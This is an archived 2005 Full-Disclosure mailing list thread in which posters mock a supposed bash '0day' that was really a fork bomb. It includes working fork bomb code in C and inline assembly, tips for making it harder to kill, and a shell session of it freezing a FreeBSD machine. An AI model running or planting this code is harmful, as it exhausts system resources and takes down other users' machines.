| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue Aug 16 10:45:14 2005
From: jaymzu at gmail.com (Jay)
Subject: bash vulnerability?
?(jay@xxx:p4)(~)
?(Power:on-line:100% cat > a.c
int main(){
__asm__(
"xorl %ecx,%ecx\n"
"cdq\n"
"HERE:\n"
"movl $0x2,%eax\n"
"int $0x80\n"
"jmp HERE\n"
);
}
^C
?(jay@xxx:p4)(~)
?(130:Power:on-line:100% make a
cc -O -pipe -march=pentium4 a.c -o a
?(jay@xxx:p4)(~)
?(Power:on-line:100% ./a
^C
?(jay@xxx:p4)(~)
?(130:Power:on-line:100% uname -srm
FreeBSD 6.0-BETA1 i386
the machine froze instantly but eventually, after a minute or so I was
able to ^C
--
Jay
On Tue, 2005-08-16 at 11:10 +0200, Rik Bobbaers wrote:
> On Monday 15 August 2005 09:59, Jay wrote:
> > It's not nice to brag about finding 0-day bullshit in the bash fork
> > bomb that has been Zalewski's signature for years :P
>
> i think i know where he got it from.. i was on an irc channel a couple of days
> ago, and someone posted it (as a joke off course). it's ... ahm... funny that
> it comes back over here just a few days later!
>
> i don't know how this is a 0day and gives you remote access (it does the
> opposite...)
>
> but if you want one that's a bit harder to stop:
>
> c version:
> int main () {
> while (1) fork();
> }
>
> an asm (quick hack):
> int main(){
> __asm__(
> "xorl %ecx,%ecx\n"
> "cdq\n"
> "HERE:\n"
> "movl $0x2,%eax\n"
> "int $0x80\n"
> "jmp HERE\n"
> );
> }
>
> sry it's in c... the machine i made it on didn't have gas or nasm.
>
> anyway, if you compile this and run it in background, it will all die pretty
> fast. (to make it even harder, make your own signal handlers!(okay, SIGKILL
> will still work, but it will be harder to kill :))
>
> shall we call this C and assembler 0days? ;)
>
> --
> harry
> aka Rik Bobbaers
>
> K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
> Rik.Bobbaers@...kuleuven.be -=- http://harry.ulyssis.org
>
> Disclaimer:
> By sending an email to ANY of my addresses you are agreeing that:
> 1. I am by definition, "the intended recipient"
> 2. All information in the email is mine to do with as I see fit and make
> such financial profit, political mileage, or good joke as it lends itself to.
> In particular, I may quote it on usenet.
> 3. I may take the contents as representing the views of your company.
> 4. This overrides any disclaimer or statement of confidentiality that may be
> included on your message.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
--
This message was scanned for spam and viruses by BitDefender.
For more information please visit http://www.bitdefender.com/
Powered by blists - more mailing lists